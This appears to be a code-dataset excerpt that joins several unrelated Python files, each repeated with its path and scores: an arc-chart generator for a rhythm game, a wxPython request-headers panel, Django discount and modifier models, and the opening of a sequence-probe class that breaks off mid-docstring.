easing_offset_t: Callable = linear
) -> NoteGroup:
delta_t = 1000 / framerate
count = int((stop_t - start_t) / delta_t)
destgroup = NoteGroup()
for i in range(count + 1):
frame = TimingGroup(Timing(0, basebpm), opt='noinput')
frame.append(SceneControl(0,'hidegroup', y=1))
# 这一帧的起始时间
t1 = start_t + i * delta_t
frame.append(SceneControl(t1,'hidegroup', y=0))
frame.append(Timing(t1, infbpm))
frame.append(Timing(t1 + 1, 0))
# 这一帧结束
frame.append(Timing(t1 + 1.5 * delta_t - 1, -infbpm)) # 每帧显示1.5帧时间,防止闪烁
frame.append(Timing(t1 + 1.5 * delta_t, 0))
frame.append(SceneControl(t1 + 2 * delta_t, 'hidegroup', y=1)) # 隐藏时间略晚于倒退时间
# 真正显示的假note
actual_offset_t = fake_note_t - (
offset_t - delta_offset_t * easing_offset_t(i / count))
frame.append(Timing(actual_offset_t, infbpm))
frame.append(Timing(actual_offset_t + 1, basebpm))
temp_arc = deepcopy(arc)
temp_arc = temp_arc.offsetto(fake_note_t + 1)
temp_arc.fromx += delta_x * easing_x(i / count)
temp_arc.tox += delta_x * easing_x(i / count)
temp_arc.fromy += delta_y * easing_y(i / count)
temp_arc.toy += delta_y * easing_y(i / count)
frame.append(temp_arc)
destgroup.append(frame)
return destgroup
def arc_envelope(a1: Arc, a2: Arc, count: int, mode: Literal['c', 'p'] = 'c') -> NoteGroup:
class Point:
def __init__(self, time, position) -> None:
self.time: int = time
self.x: float = position[0]
self.y: float = position[1]
arcs: List[Arc] = [a1, a2]
easing, color, isskyline = a1.slideeasing, a1.color, a1.isskyline
points: List[Point] = []
if mode == 'c':
for i in range(count + 1):
index = i % 2
arc = arcs[index]
step = (arc.totime - arc.time) / (count)
current_time = arc.time + step * i
points.append(Point(current_time, arc[current_time]))
zipped = []
for i in range(len(points) - 1):
zipped.append((points[i], points[i+1]))
return NoteGroup(map(lambda p: Arc(
p[0].time, p[1].time, p[0].x, p[1].x, easing, p[0].y, p[1].y, color, isskyline
), zipped)
)
elif mode == 'p':
zipped = zip(
arc_slice_by_count(arcs[0], count), arc_slice_by_count(arcs[1], count)
)
return NoteGroup(map(lambda p: Arc(
p[0].time, p[0].totime, p[0].fromx, p[1].tox, easing, p[0].fromy, p[1].toy, color, isskyline
), zipped))
else:
raise AffNoteValueError(f"Excepting 'c' or 'p' for 'mode', not {mode}")
def arc_straighten(arcs: NoteGroup, x: bool = False, y: bool = False, connector: bool = False) -> NoteGroup:
result = NoteGroup([])
if not (x or y or connector):
print('Warning: No option used, will return origin NoteGroup')
return arcs
for i in range(len(arcs)):
arc = arcs[i]
if not isinstance(arc, Arc):
raise AffNoteTypeError(f"Excepting 'Arc', not {type(arc).__name__}")
if x:
arc.tox = arc.fromx
if y:
arc.toy = arc.fromy
result.append(arc)
if connector and (i != len(arcs) - 1):
next_arc = arcs[i+1]
if isinstance(next_arc, Arc) and (next_arc.fromx != arc.tox or next_arc.fromy != arc.toy):
result.append(Arc(arc.totime, arc.totime, arc.tox, next_arc.fromx, 's', arc.toy, next_arc.fromy, arc.color, arc.isskyline))
return result
def arc_interlace(arcs: NoteGroup):
result = NoteGroup([])
for i in range(0, len(arcs) - 1, 2):
if isinstance(arcs[i], Arc) and isinstance(arcs[i + 1], Arc):
arcs[i + 1].isskyline = not arcs[i + 1].isskyline
else:
raise AffNoteTypeError(f"Excepting 'Arc', not {type(arcs[i]).__name__}")
return arcs | src/arcfutil/aff/generator/arc_sample.py |
# (c)2021 .direwolf <<EMAIL>>
# Licensed under the MIT License.
from typing import Callable, Iterable, List, Literal
from arcfutil.aff.note.notegroup import TimingGroup
from ..note import Arc
from ..note import NoteGroup
from ..note import SceneControl
from ..note import Timing
from random import randint
from ...exception import AffNoteTypeError, AffNoteValueError
from ..easing import get_ease, linear
from copy import deepcopy
def arc_crease_line(
base: Arc,
x_range: float,
y_range: float,
count: int,
mode='m',
easing='s'
) -> NoteGroup:
"""
:param easing:
:param base:
:param x_range:
:param y_range:
:param count:
:param mode: 'm' for regarding base arc as median,
'b' for regarding base arc as border.
:return:
"""
each_len = (base.totime - base.time) / count
arclist = NoteGroup(base[::each_len])
currentx = base.fromx
currenty = base.fromy
if mode == 'm':
for each in arclist:
each.fromx = currentx
each.fromy = currenty
each.tox += x_range
each.toy += y_range
each.slideeasing = easing
x_range = -x_range
y_range = -y_range
currentx = each.tox
currenty = each.toy
elif mode == 'b':
for i in range(1, len(arclist), 2):
arclist[i].fromx += x_range
arclist[i - 1].tox += x_range
arclist[i].fromy += y_range
arclist[i - 1].toy += y_range
arclist[i].slideeasing = easing
arclist[i - 1].slideeasing = easing
else:
raise ValueError('Invalid mode:' + mode)
return arclist
def arc_rain(original_t: int, dest_t: int, step: float, length: float = None):
def max_x(y: int) -> int:
return int(-0.5 * y + 200)
def min_x(y: int) -> int:
return int(0.5 * y)
destgroup = NoteGroup()
if length is None:
length = step
current_time = original_t
while current_time <= dest_t:
rand_y = randint(0, 100)
rand_x = randint(min_x(rand_y), max_x(rand_y))
if dest_t - current_time <= length: # 如果时间不足就截断
actual_dest_t = dest_t
else:
actual_dest_t = int(current_time + length)
destgroup.append(Arc(
current_time,
actual_dest_t,
(rand_x - 50) / 100,
(rand_x - 50) / 100,
's',
rand_y / 100,
rand_y / 100,
0,
True
))
current_time += step
return destgroup
def arc_slice_by_count(arc: Arc, count: int, start: int = None, stop: int = None):
start = start if start is not None else arc.time
stop = stop if stop is not None else arc.totime
if stop < start:
raise AffNoteValueError(
'stop time before start time'
)
step = (stop - start) / count
if step < 1:
step = 1
count = arc.totime - arc.time
destgroup = NoteGroup()
for i in range(count):
destgroup.append(Arc(
start + i * step,
start + (i + 1) * step,
arc[start + i * step][0],
arc[start + (i + 1) * step][0],
's',
arc[start + i * step][1],
arc[start + (i + 1) * step][1],
arc.color,
arc.isskyline,
fx=arc.fx
))
return destgroup
def arc_slice_by_timing(arc: Arc, timings: Iterable):
timepoints = {arc.time, arc.totime}
for each in timings:
if isinstance(each, Timing) and arc.time <= each.time <= arc.totime:
timepoints.add(each.time)
timepoints = sorted(timepoints)
destgroup = NoteGroup()
for i in range(len(timepoints) - 1):
from_time = timepoints[i]
to_time = timepoints[i + 1]
from_slice = arc[from_time]
to_slice = arc[to_time]
temp_arc = Arc(
from_time,
to_time,
from_slice[0],
to_slice[0],
's',
from_slice[1],
to_slice[1],
arc.color,
arc.isskyline
)
if arc.isskyline and arc.skynote:
valid_skynotes = []
for each in arc.skynote:
if from_time <= each < to_time:
valid_skynotes.append(each)
elif each == to_time and i == (len(timepoints) - 2): # 黑线末尾的天键
valid_skynotes.append(each)
temp_arc.skynote = valid_skynotes
destgroup.append(temp_arc)
return destgroup
def arc_animation_assist(
arc: Arc,
start_t: int,
stop_t: int,
delta_x: float,
delta_y: float,
basebpm: float,
easing_x: Callable = linear,
easing_y: Callable = linear,
infbpm: float = 999999,
framerate: float = 60,
fake_note_t: int = 100000,
offset_t: int = 0,
delta_offset_t = 0,
easing_offset_t: Callable = linear
) -> NoteGroup:
delta_t = 1000 / framerate
count = int((stop_t - start_t) / delta_t)
destgroup = NoteGroup()
for i in range(count + 1):
frame = TimingGroup(Timing(0, basebpm), opt='noinput')
frame.append(SceneControl(0,'hidegroup', y=1))
# 这一帧的起始时间
t1 = start_t + i * delta_t
frame.append(SceneControl(t1,'hidegroup', y=0))
frame.append(Timing(t1, infbpm))
frame.append(Timing(t1 + 1, 0))
# 这一帧结束
frame.append(Timing(t1 + 1.5 * delta_t - 1, -infbpm)) # 每帧显示1.5帧时间,防止闪烁
frame.append(Timing(t1 + 1.5 * delta_t, 0))
frame.append(SceneControl(t1 + 2 * delta_t, 'hidegroup', y=1)) # 隐藏时间略晚于倒退时间
# 真正显示的假note
actual_offset_t = fake_note_t - (
offset_t - delta_offset_t * easing_offset_t(i / count))
frame.append(Timing(actual_offset_t, infbpm))
frame.append(Timing(actual_offset_t + 1, basebpm))
temp_arc = deepcopy(arc)
temp_arc = temp_arc.offsetto(fake_note_t + 1)
temp_arc.fromx += delta_x * easing_x(i / count)
temp_arc.tox += delta_x * easing_x(i / count)
temp_arc.fromy += delta_y * easing_y(i / count)
temp_arc.toy += delta_y * easing_y(i / count)
frame.append(temp_arc)
destgroup.append(frame)
return destgroup
def arc_envelope(a1: Arc, a2: Arc, count: int, mode: Literal['c', 'p'] = 'c') -> NoteGroup:
class Point:
def __init__(self, time, position) -> None:
self.time: int = time
self.x: float = position[0]
self.y: float = position[1]
arcs: List[Arc] = [a1, a2]
easing, color, isskyline = a1.slideeasing, a1.color, a1.isskyline
points: List[Point] = []
if mode == 'c':
for i in range(count + 1):
index = i % 2
arc = arcs[index]
step = (arc.totime - arc.time) / (count)
current_time = arc.time + step * i
points.append(Point(current_time, arc[current_time]))
zipped = []
for i in range(len(points) - 1):
zipped.append((points[i], points[i+1]))
return NoteGroup(map(lambda p: Arc(
p[0].time, p[1].time, p[0].x, p[1].x, easing, p[0].y, p[1].y, color, isskyline
), zipped)
)
elif mode == 'p':
zipped = zip(
arc_slice_by_count(arcs[0], count), arc_slice_by_count(arcs[1], count)
)
return NoteGroup(map(lambda p: Arc(
p[0].time, p[0].totime, p[0].fromx, p[1].tox, easing, p[0].fromy, p[1].toy, color, isskyline
), zipped))
else:
raise AffNoteValueError(f"Excepting 'c' or 'p' for 'mode', not {mode}")
def arc_straighten(arcs: NoteGroup, x: bool = False, y: bool = False, connector: bool = False) -> NoteGroup:
result = NoteGroup([])
if not (x or y or connector):
print('Warning: No option used, will return origin NoteGroup')
return arcs
for i in range(len(arcs)):
arc = arcs[i]
if not isinstance(arc, Arc):
raise AffNoteTypeError(f"Excepting 'Arc', not {type(arc).__name__}")
if x:
arc.tox = arc.fromx
if y:
arc.toy = arc.fromy
result.append(arc)
if connector and (i != len(arcs) - 1):
next_arc = arcs[i+1]
if isinstance(next_arc, Arc) and (next_arc.fromx != arc.tox or next_arc.fromy != arc.toy):
result.append(Arc(arc.totime, arc.totime, arc.tox, next_arc.fromx, 's', arc.toy, next_arc.fromy, arc.color, arc.isskyline))
return result
def arc_interlace(arcs: NoteGroup):
result = NoteGroup([])
for i in range(0, len(arcs) - 1, 2):
if isinstance(arcs[i], Arc) and isinstance(arcs[i + 1], Arc):
arcs[i + 1].isskyline = not arcs[i + 1].isskyline
else:
raise AffNoteTypeError(f"Excepting 'Arc', not {type(arcs[i]).__name__}")
return arcs | 0.71423 | 0.341335 |
import wx
from kurier.interfaces import IStateRestorable
from kurier.widgets.list_ctrl import EditableListCtrl
class RequestHeadersTab(IStateRestorable, wx.Panel):
USED_COLUMNS = ["Header name", "Value"]
UTILITY_ROW_TEXT = "Click here for adding a new user header..."
def __init__(self, *args, **kwargs):
super(RequestHeadersTab, self).__init__(*args, **kwargs)
self.sizer = wx.BoxSizer(wx.HORIZONTAL)
self.headers_ctrl = EditableListCtrl(
self,
columns=self.USED_COLUMNS,
utility_row_text=self.UTILITY_ROW_TEXT
)
self.InitUI()
self.BindUI()
def InitUI(self):
self.AddUtilityRow()
self.sizer.Add(self.headers_ctrl, proportion=1, flag=wx.EXPAND)
self.SetSizer(self.sizer)
def InitFromState(self, **state):
self.ClearHeadersTab()
headers = state.get("headers", {})
for key, value in headers.items():
self.AddNewHeader(key, value)
def BindUI(self):
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnListItemSelected)
def ClearHeadersTab(self):
self.DeleteUtilityRow()
self.headers_ctrl.DeleteAllItems()
self.AddUtilityRow()
def AddUtilityRow(self):
self.headers_ctrl.AddUtilityRow()
def DeleteUtilityRow(self):
self.headers_ctrl.DeleteUtilityRow()
def AddNewHeader(self, header_name, value=wx.EmptyString):
insert_index = self.headers_ctrl.GetItemCount() - 1
self.headers_ctrl.AddNewRow(header_name, value, insert_index)
def OnListItemSelected(self, event):
event.Skip()
row_info = event.GetItem()
# TODO: Add new row and focus on the first column (header name)
if row_info.GetId() == self.headers_ctrl.GetItemCount() - 1:
self.AddNewHeader('Key')
def GetHeaders(self):
properties = {}
rows = self.headers_ctrl.GetItemCount() - 1
for row in range(rows):
key = self.headers_ctrl.GetItem(itemIdx=row, col=0).GetText().strip()
value = self.headers_ctrl.GetItem(itemIdx=row, col=1).GetText()
properties[key] = value
return properties | kurier/widgets/request/headers.py | import wx
from kurier.interfaces import IStateRestorable
from kurier.widgets.list_ctrl import EditableListCtrl
class RequestHeadersTab(IStateRestorable, wx.Panel):
USED_COLUMNS = ["Header name", "Value"]
UTILITY_ROW_TEXT = "Click here for adding a new user header..."
def __init__(self, *args, **kwargs):
super(RequestHeadersTab, self).__init__(*args, **kwargs)
self.sizer = wx.BoxSizer(wx.HORIZONTAL)
self.headers_ctrl = EditableListCtrl(
self,
columns=self.USED_COLUMNS,
utility_row_text=self.UTILITY_ROW_TEXT
)
self.InitUI()
self.BindUI()
def InitUI(self):
self.AddUtilityRow()
self.sizer.Add(self.headers_ctrl, proportion=1, flag=wx.EXPAND)
self.SetSizer(self.sizer)
def InitFromState(self, **state):
self.ClearHeadersTab()
headers = state.get("headers", {})
for key, value in headers.items():
self.AddNewHeader(key, value)
def BindUI(self):
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnListItemSelected)
def ClearHeadersTab(self):
self.DeleteUtilityRow()
self.headers_ctrl.DeleteAllItems()
self.AddUtilityRow()
def AddUtilityRow(self):
self.headers_ctrl.AddUtilityRow()
def DeleteUtilityRow(self):
self.headers_ctrl.DeleteUtilityRow()
def AddNewHeader(self, header_name, value=wx.EmptyString):
insert_index = self.headers_ctrl.GetItemCount() - 1
self.headers_ctrl.AddNewRow(header_name, value, insert_index)
def OnListItemSelected(self, event):
event.Skip()
row_info = event.GetItem()
# TODO: Add new row and focus on the first column (header name)
if row_info.GetId() == self.headers_ctrl.GetItemCount() - 1:
self.AddNewHeader('Key')
def GetHeaders(self):
properties = {}
rows = self.headers_ctrl.GetItemCount() - 1
for row in range(rows):
key = self.headers_ctrl.GetItem(itemIdx=row, col=0).GetText().strip()
value = self.headers_ctrl.GetItem(itemIdx=row, col=1).GetText()
properties[key] = value
return properties | 0.289271 | 0.079246 |
from __future__ import absolute_import, unicode_literals
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models import Count, F, Q
from django.utils import timezone
from django.utils.encoding import python_2_unicode_compatible
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from parler.managers import TranslatableQuerySet
from parler.models import TranslatableModel, TranslatedFields
from shop.money.fields import MoneyField
from shopit.models.cart import CartDiscountCode
from shopit.models.customer import Customer
from shopit.modifier_conditions import modifier_conditions_pool
from shopit.utils import get_error_message as em
class ModifierQuerySet(TranslatableQuerySet):
def active(self):
return self.filter(active=True)
def filtering_enabled(self):
"""
Returns queryset with modifiers that are allowed to be used
when filtering a list of products. This includes modifiers that don't
have any conditions or discount codes that are required. Also skips
the 'cart' modifiers.
"""
return self.filter(kind__in=[Modifier.STANDARD, Modifier.DISCOUNT]).\
prefetch_related('discount_codes').prefetch_related('conditions').\
annotate(num_discount_codes=Count('discount_codes'), num_conditions=Count('conditions')).\
filter(num_discount_codes=0, num_conditions=0)
@python_2_unicode_compatible
class Modifier(TranslatableModel):
STANDARD = 'standard'
DISCOUNT = 'discount'
CART = 'cart'
KINDS = (
(STANDARD, _('Standard')),
(DISCOUNT, _('Discount')),
(CART, _('Cart')),
)
translations = TranslatedFields(
name=models.CharField(
_('Name'),
max_length=128,
),
)
code = models.SlugField(
_('Code'),
unique=True,
help_text=_('Unique identifier for this modifier.'),
)
amount = MoneyField(
_('Amount'),
default=0,
help_text=('Amount that should be added. Can be negative.'),
)
percent = models.DecimalField(
_('Percent'),
blank=True,
null=True,
max_digits=4,
decimal_places=2,
help_text=_('Percent that should be added, overrides the amount. Can be negative.'),
)
kind = models.CharField(
_('Kind'),
max_length=16,
choices=KINDS,
default=STANDARD,
help_text=_(
'Standard affects the product regardles, Discount checks for a "Discountable" flag on a product and '
'should be negative, Cart will affect an entire cart.'
),
)
active = models.BooleanField(
_('Active'),
default=True,
help_text=_('Is this modifier publicly visible.'),
)
created_at = models.DateTimeField(
_('Created at'),
auto_now_add=True,
)
updated_at = models.DateTimeField(
_('Updated at'),
auto_now=True,
)
order = models.PositiveIntegerField(
_('Sort'),
default=0,
)
objects = ModifierQuerySet.as_manager()
class Meta:
db_table = 'shopit_modifiers'
verbose_name = _('Modifier')
verbose_name_plural = _('Modifiers')
ordering = ['order']
def __str__(self):
return self.label
def save(self, *args, **kwargs):
self.clean()
super(Modifier, self).save(*args, **kwargs)
@property
def label(self):
return self.safe_translation_getter('name', any_language=True)
@property
def requires_code(self):
return self.discount_codes.active().exists()
@property
def is_filtering_enabled(self):
return Modifier.objects.filtering_enabled().active().filter(id=self.id).exists()
def get_conditions(self):
if not hasattr(self, '_conditions'):
setattr(self, '_conditions', list(self.conditions.all()))
return getattr(self, '_conditions')
def get_discount_codes(self, include_added=False):
key = '_discount_codes_added' if include_added else '_discount_codes'
if not hasattr(self, key):
setattr(self, key, list(self.discount_codes.valid(include_added=include_added)))
return getattr(self, key)
def get_added_amount(self, price, quantity=1):
return self.percent * price / 100 if self.percent else self.amount * quantity
def can_be_applied(self, request, cart_item=None, cart=None):
"""
Returns if a modifier can be applied to the given cart or cart item.
Either `cart_item` or `cart` must be passed in.
"""
if cart_item is None and cart is None:
return False
if cart_item and not self.is_eligible_product(cart_item.product):
return False
for condition in self.get_conditions():
if not condition.is_met(request, cart_item, cart):
return False
if self.requires_code and not self.is_code_applied(cart_item.cart_id if cart_item else cart.id):
return False
return self.active # Should never happen to be False up to this point, but just in case.
def is_eligible_product(self, product):
"""
Returns if modifier can be applied to the given product.
"""
if self.kind == self.DISCOUNT:
return product.discountable
return self.kind == self.STANDARD
def is_code_applied(self, cart_id):
"""
Make sure that at least one code is applied to the given cart.
"""
cart_codes = CartDiscountCode.objects.filter(cart_id=cart_id).values_list('code', flat=True)
for code in self.get_discount_codes(include_added=True):
if code.code in cart_codes:
return True
return False
def clean(self):
if self.kind == self.DISCOUNT:
if self.percent and self.percent >= 0 or not self.percent and self.amount >= 0:
raise ValidationError(em('discount_not_negative'))
@classmethod
def get_cart_modifiers(cls):
return cls.objects.filter(kind=cls.CART)
@python_2_unicode_compatible
class ModifierCondition(models.Model):
"""
Inline model for Modifier that adds conditions that must be met for
Modifier to be valid.
"""
CONDITIONS = modifier_conditions_pool.get_condition_choices()
modifier = models.ForeignKey(
Modifier,
models.CASCADE,
related_name='conditions',
verbose_name=_('Modifier'),
)
path = models.CharField(
_('Condition'),
max_length=255,
blank=True,
choices=CONDITIONS,
)
value = models.DecimalField(
_('Value'),
blank=True,
null=True,
max_digits=10,
decimal_places=2,
)
order = models.PositiveIntegerField(
_('Sort'),
default=0,
)
class Meta:
db_table = 'shopit_modifier_conditions'
verbose_name = _('Condition')
verbose_name_plural = _('Conditions')
ordering = ['order']
def __str__(self):
name = dict(self.CONDITIONS).get(self.path)
name = '%s %s' % (name, self.value or '')
return name.rstrip()
def save(self, *args, **kwargs):
self.clean()
super(ModifierCondition, self).save(*args, **kwargs)
def is_met(self, request, cart_item=None, cart=None):
if self.condition and cart_item:
return self.condition.cart_item_condition(request, cart_item, self.value)
if self.condition and cart:
return self.condition.cart_condition(request, cart, self.value)
return True
def clean(self):
if not self.path:
raise ValidationError(em('modifier_no_condition_path'))
@cached_property
def condition(self):
return modifier_conditions_pool.get_condition(self.path)
class DiscountCodeQuerySet(models.QuerySet):
def active(self):
return self.filter(active=True)
def valid(self, include_added=False):
"""
`include_added` decides if one extra should be added to `max_uses` for
validating codes already added to cart.
"""
now = timezone.now()
qs = self.active().filter(Q(valid_from__lte=now) & (Q(valid_until__isnull=True) | Q(valid_until__gt=now)))
if include_added:
return qs.filter(Q(max_uses__isnull=True) | Q(num_uses__lte=F('max_uses')))
return qs.filter(Q(max_uses__isnull=True) | Q(num_uses__lt=F('max_uses')))
@python_2_unicode_compatible
class DiscountCode(models.Model):
"""
Discount code model when added to the modifier, it requires it to also
be added to the cart.
"""
modifier = models.ForeignKey(
Modifier,
models.CASCADE,
related_name='discount_codes',
verbose_name=_('Modifier'),
help_text=_('Modifier that this discount code applies to.'),
)
code = models.CharField(
_('Code'),
max_length=30,
unique=True,
help_text=_('Code that must be entered for the modifier to activate.'),
)
customer = models.ForeignKey(
Customer,
models.CASCADE,
blank=True,
null=True,
related_name='discount_codes',
verbose_name=_('Customer'),
help_text=_('Limit code so that it can be used only by a specific customer.'),
)
max_uses = models.PositiveIntegerField(
_('Max uses'),
blank=True,
null=True,
help_text=_('Number of times this code can be used, leave empty for unlimited usage.'),
)
num_uses = models.PositiveIntegerField(
_('Num uses'),
default=0,
help_text=_('Number of times this code has been already used.'),
)
active = models.BooleanField(
_('Active'),
default=True,
help_text=_('Is this discount code active.'),
)
valid_from = models.DateTimeField(
_('Valid from'),
default=timezone.now,
)
valid_until = models.DateTimeField(
_('Valid until'),
blank=True,
null=True,
)
order = models.PositiveIntegerField(
_('Sort'),
default=0,
)
objects = DiscountCodeQuerySet.as_manager()
class Meta:
db_table = 'shopit_discount_codes'
verbose_name = _('Discount code')
verbose_name_plural = _('Discount codes')
ordering = ['order']
def __str__(self):
return self.code
@property
def is_valid(self):
now = timezone.now()
if not self.active:
return False
if self.max_uses is not None and self.num_uses >= self.max_uses:
return False
if self.valid_until:
return self.valid_from <= now and self.valid_until > now
return self.valid_from <= now
def use(self, times=1):
"""
Should be called when code is used to update `num_uses` field.
"""
self.num_uses = self.num_uses + times
self.save(update_fields=['num_uses']) | shopit/models/modifier.py | from __future__ import absolute_import, unicode_literals
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models import Count, F, Q
from django.utils import timezone
from django.utils.encoding import python_2_unicode_compatible
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from parler.managers import TranslatableQuerySet
from parler.models import TranslatableModel, TranslatedFields
from shop.money.fields import MoneyField
from shopit.models.cart import CartDiscountCode
from shopit.models.customer import Customer
from shopit.modifier_conditions import modifier_conditions_pool
from shopit.utils import get_error_message as em
class ModifierQuerySet(TranslatableQuerySet):
def active(self):
return self.filter(active=True)
def filtering_enabled(self):
"""
Returns queryset with modifiers that are allowed to be used
when filtering a list of products. This includes modifiers that don't
have any conditions or discount codes that are required. Also skips
the 'cart' modifiers.
"""
return self.filter(kind__in=[Modifier.STANDARD, Modifier.DISCOUNT]).\
prefetch_related('discount_codes').prefetch_related('conditions').\
annotate(num_discount_codes=Count('discount_codes'), num_conditions=Count('conditions')).\
filter(num_discount_codes=0, num_conditions=0)
@python_2_unicode_compatible
class Modifier(TranslatableModel):
STANDARD = 'standard'
DISCOUNT = 'discount'
CART = 'cart'
KINDS = (
(STANDARD, _('Standard')),
(DISCOUNT, _('Discount')),
(CART, _('Cart')),
)
translations = TranslatedFields(
name=models.CharField(
_('Name'),
max_length=128,
),
)
code = models.SlugField(
_('Code'),
unique=True,
help_text=_('Unique identifier for this modifier.'),
)
amount = MoneyField(
_('Amount'),
default=0,
help_text=('Amount that should be added. Can be negative.'),
)
percent = models.DecimalField(
_('Percent'),
blank=True,
null=True,
max_digits=4,
decimal_places=2,
help_text=_('Percent that should be added, overrides the amount. Can be negative.'),
)
kind = models.CharField(
_('Kind'),
max_length=16,
choices=KINDS,
default=STANDARD,
help_text=_(
'Standard affects the product regardles, Discount checks for a "Discountable" flag on a product and '
'should be negative, Cart will affect an entire cart.'
),
)
active = models.BooleanField(
_('Active'),
default=True,
help_text=_('Is this modifier publicly visible.'),
)
created_at = models.DateTimeField(
_('Created at'),
auto_now_add=True,
)
updated_at = models.DateTimeField(
_('Updated at'),
auto_now=True,
)
order = models.PositiveIntegerField(
_('Sort'),
default=0,
)
objects = ModifierQuerySet.as_manager()
class Meta:
db_table = 'shopit_modifiers'
verbose_name = _('Modifier')
verbose_name_plural = _('Modifiers')
ordering = ['order']
def __str__(self):
return self.label
def save(self, *args, **kwargs):
self.clean()
super(Modifier, self).save(*args, **kwargs)
@property
def label(self):
return self.safe_translation_getter('name', any_language=True)
@property
def requires_code(self):
return self.discount_codes.active().exists()
@property
def is_filtering_enabled(self):
return Modifier.objects.filtering_enabled().active().filter(id=self.id).exists()
def get_conditions(self):
if not hasattr(self, '_conditions'):
setattr(self, '_conditions', list(self.conditions.all()))
return getattr(self, '_conditions')
def get_discount_codes(self, include_added=False):
key = '_discount_codes_added' if include_added else '_discount_codes'
if not hasattr(self, key):
setattr(self, key, list(self.discount_codes.valid(include_added=include_added)))
return getattr(self, key)
def get_added_amount(self, price, quantity=1):
return self.percent * price / 100 if self.percent else self.amount * quantity
def can_be_applied(self, request, cart_item=None, cart=None):
"""
Returns if a modifier can be applied to the given cart or cart item.
Either `cart_item` or `cart` must be passed in.
"""
if cart_item is None and cart is None:
return False
if cart_item and not self.is_eligible_product(cart_item.product):
return False
for condition in self.get_conditions():
if not condition.is_met(request, cart_item, cart):
return False
if self.requires_code and not self.is_code_applied(cart_item.cart_id if cart_item else cart.id):
return False
return self.active # Should never happen to be False up to this point, but just in case.
def is_eligible_product(self, product):
"""
Returns if modifier can be applied to the given product.
"""
if self.kind == self.DISCOUNT:
return product.discountable
return self.kind == self.STANDARD
def is_code_applied(self, cart_id):
"""
Make sure that at least one code is applied to the given cart.
"""
cart_codes = CartDiscountCode.objects.filter(cart_id=cart_id).values_list('code', flat=True)
for code in self.get_discount_codes(include_added=True):
if code.code in cart_codes:
return True
return False
def clean(self):
if self.kind == self.DISCOUNT:
if self.percent and self.percent >= 0 or not self.percent and self.amount >= 0:
raise ValidationError(em('discount_not_negative'))
@classmethod
def get_cart_modifiers(cls):
return cls.objects.filter(kind=cls.CART)
@python_2_unicode_compatible
class ModifierCondition(models.Model):
"""
Inline model for Modifier that adds conditions that must be met for
Modifier to be valid.
"""
CONDITIONS = modifier_conditions_pool.get_condition_choices()
modifier = models.ForeignKey(
Modifier,
models.CASCADE,
related_name='conditions',
verbose_name=_('Modifier'),
)
path = models.CharField(
_('Condition'),
max_length=255,
blank=True,
choices=CONDITIONS,
)
value = models.DecimalField(
_('Value'),
blank=True,
null=True,
max_digits=10,
decimal_places=2,
)
order = models.PositiveIntegerField(
_('Sort'),
default=0,
)
class Meta:
db_table = 'shopit_modifier_conditions'
verbose_name = _('Condition')
verbose_name_plural = _('Conditions')
ordering = ['order']
def __str__(self):
name = dict(self.CONDITIONS).get(self.path)
name = '%s %s' % (name, self.value or '')
return name.rstrip()
def save(self, *args, **kwargs):
self.clean()
super(ModifierCondition, self).save(*args, **kwargs)
def is_met(self, request, cart_item=None, cart=None):
if self.condition and cart_item:
return self.condition.cart_item_condition(request, cart_item, self.value)
if self.condition and cart:
return self.condition.cart_condition(request, cart, self.value)
return True
def clean(self):
if not self.path:
raise ValidationError(em('modifier_no_condition_path'))
@cached_property
def condition(self):
return modifier_conditions_pool.get_condition(self.path)
class DiscountCodeQuerySet(models.QuerySet):
def active(self):
return self.filter(active=True)
def valid(self, include_added=False):
"""
`include_added` decides if one extra should be added to `max_uses` for
validating codes already added to cart.
"""
now = timezone.now()
qs = self.active().filter(Q(valid_from__lte=now) & (Q(valid_until__isnull=True) | Q(valid_until__gt=now)))
if include_added:
return qs.filter(Q(max_uses__isnull=True) | Q(num_uses__lte=F('max_uses')))
return qs.filter(Q(max_uses__isnull=True) | Q(num_uses__lt=F('max_uses')))
@python_2_unicode_compatible
class DiscountCode(models.Model):
"""
Discount code model when added to the modifier, it requires it to also
be added to the cart.
"""
modifier = models.ForeignKey(
Modifier,
models.CASCADE,
related_name='discount_codes',
verbose_name=_('Modifier'),
help_text=_('Modifier that this discount code applies to.'),
)
code = models.CharField(
_('Code'),
max_length=30,
unique=True,
help_text=_('Code that must be entered for the modifier to activate.'),
)
customer = models.ForeignKey(
Customer,
models.CASCADE,
blank=True,
null=True,
related_name='discount_codes',
verbose_name=_('Customer'),
help_text=_('Limit code so that it can be used only by a specific customer.'),
)
max_uses = models.PositiveIntegerField(
_('Max uses'),
blank=True,
null=True,
help_text=_('Number of times this code can be used, leave empty for unlimited usage.'),
)
num_uses = models.PositiveIntegerField(
_('Num uses'),
default=0,
help_text=_('Number of times this code has been already used.'),
)
active = models.BooleanField(
_('Active'),
default=True,
help_text=_('Is this discount code active.'),
)
valid_from = models.DateTimeField(
_('Valid from'),
default=timezone.now,
)
valid_until = models.DateTimeField(
_('Valid until'),
blank=True,
null=True,
)
order = models.PositiveIntegerField(
_('Sort'),
default=0,
)
objects = DiscountCodeQuerySet.as_manager()
class Meta:
db_table = 'shopit_discount_codes'
verbose_name = _('Discount code')
verbose_name_plural = _('Discount codes')
ordering = ['order']
def __str__(self):
return self.code
@property
def is_valid(self):
now = timezone.now()
if not self.active:
return False
if self.max_uses is not None and self.num_uses >= self.max_uses:
return False
if self.valid_until:
return self.valid_from <= now and self.valid_until > now
return self.valid_from <= now
def use(self, times=1):
"""
Should be called when code is used to update `num_uses` field.
"""
self.num_uses = self.num_uses + times
self.save(update_fields=['num_uses']) | 0.783575 | 0.143698 |
import pyfastaq
from varifier import edit_distance
class Probe:
def __init__(self, seq, allele_start, allele_end):
self.seq = seq
self.allele_start = allele_start
self.allele_end = allele_end
def __str__(self):
return f"{self.seq} {self.allele_start} {self.allele_end}"
def __eq__(self, other):
return type(other) is type(self) and self.__dict__ == other.__dict__
def allele_seq(self):
return self.seq[self.allele_start : self.allele_end + 1]
def map_hit_includes_allele(self, map_hit):
if map_hit.strand == -1:
start = len(self.seq) - map_hit.q_en
end = len(self.seq) - map_hit.q_st
else:
start = map_hit.q_st
end = map_hit.q_en
return start < self.allele_start and self.allele_end < end
def allele_match_counts(self, map_hit):
"""Given a mappy minimap2 hit, works out how many positions in the
alignment between the allele and the reference match.
